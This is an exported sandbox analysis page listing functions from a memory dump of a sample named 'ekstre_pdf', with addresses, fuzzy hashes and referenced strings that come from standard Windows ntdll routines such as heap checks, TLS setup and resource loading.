Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 00d107159cb3e70fd93263be239ebd0b67df624d8358374d1f76c11ae1de4aa0
Instruction ID: a3b63c885c71a1fede6ba1a755ab9b5c2fe6fb7fd5eb56163d55d9e11b34e33e
Opcode Fuzzy Hash: 00d107159cb3e70fd93263be239ebd0b67df624d8358374d1f76c11ae1de4aa0
Instruction Fuzzy Hash: DBE1AE74708741DFE311CF28CA80B1ABBE4BB89358F100AADF5A58B2E1DB74D955CB42

Uniqueness

Uniqueness Score: -1.00%

Function 3406B5E0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Enter, xrefs: 3406B622
MUI, xrefs: 3406B5F8, 3406B707
LdrResGetRCConfig Exit, xrefs: 3406B634

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
API String ID: 0-1145731471
Opcode ID: 458360bce3c16096cfbc8d13e8159bbb07e417446e6986e99693d247b43fd73b
Instruction ID: bbb0df5d736a3f6f43272d8b6da31e584850c39119b61961445d73315527e961
Opcode Fuzzy Hash: 458360bce3c16096cfbc8d13e8159bbb07e417446e6986e99693d247b43fd73b
Instruction Fuzzy Hash: 23B154B5B20714CFEB15CE79C990B9DB7B5AF44798F1085ADE852AB790D738E840CB01

Uniqueness

Uniqueness Score: -1.00%

Function 3405A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

UseFilter, xrefs: 3405A171
FilterFullPath, xrefs: 340BC075
\??\, xrefs: 340BBF73

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: f3a7f44bf3029bb9daac3947de39ce714737c8ca9e217170efe38bdd725a1f86
Instruction ID: 86fe647f140acb1217a08c94fd7b5e4686ccb0da1fa6ca0ffaa152c52160b1a5
Opcode Fuzzy Hash: f3a7f44bf3029bb9daac3947de39ce714737c8ca9e217170efe38bdd725a1f86
Instruction Fuzzy Hash: CAA19A75A116299FEF31DF64CC88B9AB7B8EF44314F1005EAE908A7250DB359E84CF58

Uniqueness

Uniqueness Score: -1.00%

Function 3405F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 340BE435
HEAP: , xrefs: 340BE442
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 340BE455

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: 1e0365bc78a007de6660939eff0cc97323c7e82fc36ba6fa939514c15ab14f38
Instruction ID: 90050356a23c63eb7e9a861c57a113881a362e25cdb8a6ab3d3887d0950444a4
Opcode Fuzzy Hash: 1e0365bc78a007de6660939eff0cc97323c7e82fc36ba6fa939514c15ab14f38
Instruction Fuzzy Hash: D051BE35708784EFF716CBA8C988B9ABBF8EF04744F0444E5E5848B6A2D778E900CB55

Uniqueness

Uniqueness Score: -1.00%

Function 34081514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

LdrpCompleteMapModule, xrefs: 340CA39D
minkernel\ntdll\ldrmap.c, xrefs: 340CA3A7
Could not validate the crypto signature for DLL %wZ, xrefs: 340CA396

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 7d66f5e0dd2a7bbe9e66edba73f3e1441fd405fea4a8468bdc4c4b266d4f5e62
Instruction ID: 87d91b11b8ff3e86c9111115898f36a5a3e1b2f148aea4bfe57b8a4ae5ef6092
Opcode Fuzzy Hash: 7d66f5e0dd2a7bbe9e66edba73f3e1441fd405fea4a8468bdc4c4b266d4f5e62
Instruction Fuzzy Hash: 5751CC74B00741DFF7119B68CA54B1A7BE8EF40758F1006E8E952AF6E2DB34E940CB42

Uniqueness

Uniqueness Score: -1.00%

Function 3410D62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 3410D792
Heap block at %p modified at %p past requested size of %Ix, xrefs: 3410D7B2
HEAP: , xrefs: 3410D79F

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: ab4c4359adcd08d9cc9eb440f098d68b1c4c6d9952440d795f9815707a49e23d
Instruction ID: c63fcad76b96cbd12f5ae1af75801a6a99a0cd549346311d761461ffa0bd140a
Opcode Fuzzy Hash: ab4c4359adcd08d9cc9eb440f098d68b1c4c6d9952440d795f9815707a49e23d
Instruction Fuzzy Hash: B151E179200B508EF360DA2ACCC077277E5EB45288F92C8CEE4C58B695DB66D847DF61

Uniqueness

Uniqueness Score: -1.00%

Function 3405753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 340BAD3A
Invalid address specified to %s( %p, %p ), xrefs: 340BAD5A
HEAP: , xrefs: 340BAD47

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: 2b05156373aaae716e673fd2091775d3f616a582d3219835fcb15beb268a7273
Instruction ID: ec5ff97544b736337b4ccd613fb45011334bcb9a144c035fb0491075458b1a05
Opcode Fuzzy Hash: 2b05156373aaae716e673fd2091775d3f616a582d3219835fcb15beb268a7273
Instruction Fuzzy Hash: 184124783083408FFF15DE29C480BA97BE4EF01344F6444EDD486AB662CAB5D445DF25

Uniqueness

Uniqueness Score: -1.00%

Function 340915EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON

Download Yara Rule

Strings

TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 340D1943
minkernel\ntdll\ldrtls.c, xrefs: 340D1954
LdrpAllocateTls, xrefs: 340D194A

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
API String ID: 0-4274184382
Opcode ID: e7a2a2793d4ac7d012295fb6faee45fe7ae12c07b96052887ddd7430b196eae7
Instruction ID: 6698925bd424183ecf4f950aa19170380c1ad607008edd1ef615dc65f95356f2
Opcode Fuzzy Hash: e7a2a2793d4ac7d012295fb6faee45fe7ae12c07b96052887ddd7430b196eae7
Instruction Fuzzy Hash: D04149B5B00605EFEB15CFA9C941A9EBBF5FF48304F0441A9E406AB251DB35A801CF94

Uniqueness

Uniqueness Score: -1.00%

Function 340EB214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 340EB2B2
GlobalFlag, xrefs: 340EB30F
@, xrefs: 340EB2F0

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: 53857eaabc806d3d2c672f2fe324f8ef2f581bf16a6541d0d05b90a1a9deeca3
Instruction ID: 45fe482cd80067320ac2cc526809702bdebd579be8d0cdc994d3848c665fb79f
Opcode Fuzzy Hash: 53857eaabc806d3d2c672f2fe324f8ef2f581bf16a6541d0d05b90a1a9deeca3
Instruction Fuzzy Hash: 623149B1B01619AFEB10DFA4CD81AEEBBBCEF44348F4004ADA601A7250D7749E548BA0

Uniqueness

Uniqueness Score: -1.00%

Function 34091527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

DLL "%wZ" has TLS information at %p, xrefs: 340D184A
minkernel\ntdll\ldrtls.c, xrefs: 340D185B
LdrpInitializeTls, xrefs: 340D1851

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
API String ID: 0-931879808
Opcode ID: 7e5498719bb8a090eccb94db81a5cd04894391a2c2805617d0a729126de4b8a6
Instruction ID: 99859946acdde24df01631fb6245a40b600efcff7a276909d97adafb8e698464
Opcode Fuzzy Hash: 7e5498719bb8a090eccb94db81a5cd04894391a2c2805617d0a729126de4b8a6
Instruction Fuzzy Hash: 5031CF72B00704EBF7909A55CD81BDA76FCEB40398F4200E9A406BB2A4DB70BD459B94

Uniqueness

Uniqueness Score: -1.00%

Function 340E85AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 340E85DE

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: dcb013a406bc8ff900131ac8d8cb3732a9b5dca2c5941595e63f9142bcb47ffd
Instruction ID: d288f0919559a3dd4f83c122cb29a5c845a9098667e15d3435e4731de0278f29
Opcode Fuzzy Hash: dcb013a406bc8ff900131ac8d8cb3732a9b5dca2c5941595e63f9142bcb47ffd
Instruction Fuzzy Hash: 4701F737300E00DFE6215A61E9C4AAA3BA9EF412A8F4008ECE44217566CB20A8E1CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 340751C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 340754C3
@, xrefs: 34075365

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 44210c720de15170b20da725cfb0f69ca6a8a936358ba022203666fe495df2f8
Instruction ID: b28c876cd51f705586ac92287868bfd848c2a6da1f88ca756545032858ccb92f
Opcode Fuzzy Hash: 44210c720de15170b20da725cfb0f69ca6a8a936358ba022203666fe495df2f8
Instruction Fuzzy Hash: 1C32BDB4708351CFD7608F54C490BAEBBE5AF88744F4049AEF9858BAA0E734D844CB97

Uniqueness

Uniqueness Score: -1.00%

Function 34065622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34065698
RtlDebugPrintTimes.NTDLL ref: 340C061D

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 2b168b47f4abcc35dccc93a4d663feefbde3b3a11f5442b795a06a9430758ac7
Instruction ID: 8ac30af13ccb592c2126705e07861f22a536092364d8f780b015e8c9212ff7cb
Opcode Fuzzy Hash: 2b168b47f4abcc35dccc93a4d663feefbde3b3a11f5442b795a06a9430758ac7
Instruction Fuzzy Hash: 28317035301B12EFE7459BB4DA80A8EBBA9FF44798F004195E90297A50DB74EC31CB91

Uniqueness

Uniqueness Score: -1.00%

Function 340E9567 Relevance: 3.1, APIs: 2, Instructions: 62timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 340E9598
RtlDebugPrintTimes.NTDLL ref: 340E95D6

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 37f44eb5d8355a94465c3595abf085ce3e31a8aa6b1d895d4f31acb6a88742df
Instruction ID: 6528b071fc200189087d53d59edc49418096c31eedbcd9081cf639b9b0ca8668
Opcode Fuzzy Hash: 37f44eb5d8355a94465c3595abf085ce3e31a8aa6b1d895d4f31acb6a88742df
Instruction Fuzzy Hash: 30119472B14A19EFEB059B58C984A6EBBADEB48364F1101A9E445E3300DB709D51CF94

Uniqueness

Uniqueness Score: -1.00%

Function 340E174B Relevance: 2.8, Strings: 2, Instructions: 278COMMON

Download Yara Rule

Strings

AddD, xrefs: 340E18CD
@, xrefs: 340E1877

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: @$AddD
API String ID: 0-2525844869
Opcode ID: 240766d8c027f1d2222a8a6cb4671065d8a63a33e44024c32b7fca9c68829de5
Instruction ID: 3d74bff081f11750da64eb6f257de5ac257deb8a28a1fb5b2bc5468d75c5fb53
Opcode Fuzzy Hash: 240766d8c027f1d2222a8a6cb4671065d8a63a33e44024c32b7fca9c68829de5
Instruction Fuzzy Hash: E7A168B6608300AFE314CB54C944FBBF7E9FF88704F544A6EF9948A250E770E9558B62

Uniqueness

Uniqueness Score: -1.00%

Function 3413B55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 3413B5C4
RedirectedKey, xrefs: 3413B60E

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
API String ID: 0-1388552009
Opcode ID: 7bba44072bf7e46d04dd051b422c678f6d53fa1515186249fe445220e1c89132
Instruction ID: 9abde5c7fca4d81664260142a43081d599abb02bfdc05dfda04b75a81a1a7f4c
Opcode Fuzzy Hash: 7bba44072bf7e46d04dd051b422c678f6d53fa1515186249fe445220e1c89132
Instruction Fuzzy Hash: C86103B5D01618EFDB11CF95C988ADEBFB8FB08714F5080AAE805A7251E7349A45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 3407F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

$, xrefs: 3407F780
$, xrefs: 3407F716

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$
API String ID: 3446177414-233714265
Opcode ID: fd6a74c910c7cd7c56646b7f69ab89d50d63fa4ef3e4193cc1a24709a5ad330e
Instruction ID: 3460e141ba9b17c4a16acd5c3078db4d5d700e4528597efe04b694f261557846
Opcode Fuzzy Hash: fd6a74c910c7cd7c56646b7f69ab89d50d63fa4ef3e4193cc1a24709a5ad330e
Instruction Fuzzy Hash: 65619F75B00B49CFEB60CFA4C680B9DBBF1FF44708F1044A9D525AB650CB74A941DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 3406A1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 3406A229
RtlpResUltimateFallbackInfo Enter, xrefs: 3406A21B

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: b6d71bb03cfcc29fc3ca0b0fc1bf6dfcc7c5409c4958a4b8a2f78277d27b89fe
Instruction ID: 7a657b5c773bec397098ad6f626f7009a945642b8f8788bbf08db969c9d9fa8c
Opcode Fuzzy Hash: b6d71bb03cfcc29fc3ca0b0fc1bf6dfcc7c5409c4958a4b8a2f78277d27b89fe
Instruction Fuzzy Hash: 0741AA74B40745DBEB01DFA9D440B5DBBF4EF46758F1040E9E806AB2A4E63AC940CB12

Uniqueness

Uniqueness Score: -1.00%

Function 340F314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Enter, xrefs: 340F317C
LdrResGetRCConfig Exit, xrefs: 340F318E

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: aad44e189cf11bd45abc23c5773d6fcb5b6d0a7821d83576e23f6d7cc681a867
Instruction ID: fbc310a70043102df83fae8cf4314c0ed49860d8b581bf45c30941c9f12aed12
Opcode Fuzzy Hash: aad44e189cf11bd45abc23c5773d6fcb5b6d0a7821d83576e23f6d7cc681a867
Instruction Fuzzy Hash: 1331AB75318781DFE301CBA8DD50B2ABBE8EF85764F0408ADE8548B390EA32D905CB53

Uniqueness

Uniqueness Score: -1.00%

Function 340931BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

.Local\, xrefs: 340931D5
@, xrefs: 3409322D

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: 5925be30294f6bbac59e86fd71c8152883d6e3d148685755a7df235667dff6fb
Instruction ID: 14a11059c01d06da42e0e3c943543428d0b240a946d59f492e7105d052c4e651
Opcode Fuzzy Hash: 5925be30294f6bbac59e86fd71c8152883d6e3d148685755a7df235667dff6fb
Instruction Fuzzy Hash: FA3172B57093019FE315CF68C980A9BBBE8FB89654F0009AEF99593260D635DD08DF93

Uniqueness

Uniqueness Score: -1.00%

Function 3409A4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 3409A504
Threadpool!, xrefs: 3409A509

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: f2bfe6be71a2fd13db68b7873ea2117131f943823c764d0a645871a929fe6754
Instruction ID: ef10622c4dce301c009b3fbdd35e374a03d545d3aa0f90b31150b4a9e626bdfc
Opcode Fuzzy Hash: f2bfe6be71a2fd13db68b7873ea2117131f943823c764d0a645871a929fe6754
Instruction Fuzzy Hash: 110121B2310B40AFE351EF14CE00B5277E8E74071AF0089B9A508D75A0E734D910CF46

Uniqueness

Uniqueness Score: -1.00%

Function 3406C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 3406C7E3, 3406C960

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 9516c5954b56714937244a1bdd2dae610778392c7111d75c1b66dc97a378ab83
Instruction ID: 31bc349c132c0ac06e759b12d61b3be7d181c6ae9da14cea0d5c5a4cedb58c0e
Opcode Fuzzy Hash: 9516c5954b56714937244a1bdd2dae610778392c7111d75c1b66dc97a378ab83
Instruction Fuzzy Hash: 42824C79F043189FEB24CFA9C980B9DB7B5FF49358F1081A9D85BAB250DB389941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 340664F0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68e0cadeb73f008b5db844d93bb003c432f474b1ff5e097ec37b529fd0c357e6
Instruction ID: c160adbf27d1141c76c6e8ae7fe7515d5c6e9dfc1f7bfdf4ffeef7b349dfd0df
Opcode Fuzzy Hash: 68e0cadeb73f008b5db844d93bb003c432f474b1ff5e097ec37b529fd0c357e6
Instruction Fuzzy Hash: 7AE16B74608341CFD704CF28C190A5EBBE1FF89358F048AADE89A97361DB35E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 3408E507 Relevance: 1.8, APIs: 1, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caa0b6ffe01a75a6f737e679f79aaa20dcb1d33a9be0989aa0b2b822bac54121
Instruction ID: 99fde84d59e4494c5ed1460f491db9af456bb03c95e527f02f79cddfe4348917
Opcode Fuzzy Hash: caa0b6ffe01a75a6f737e679f79aaa20dcb1d33a9be0989aa0b2b822bac54121
Instruction Fuzzy Hash: 00A1CF75F00714EFFB118AA4CA44B9EBBE8AB04798F0101E9E910AB2D4D7789D548BD7

Uniqueness

Uniqueness Score: -1.00%

Function 34061051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34061153

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
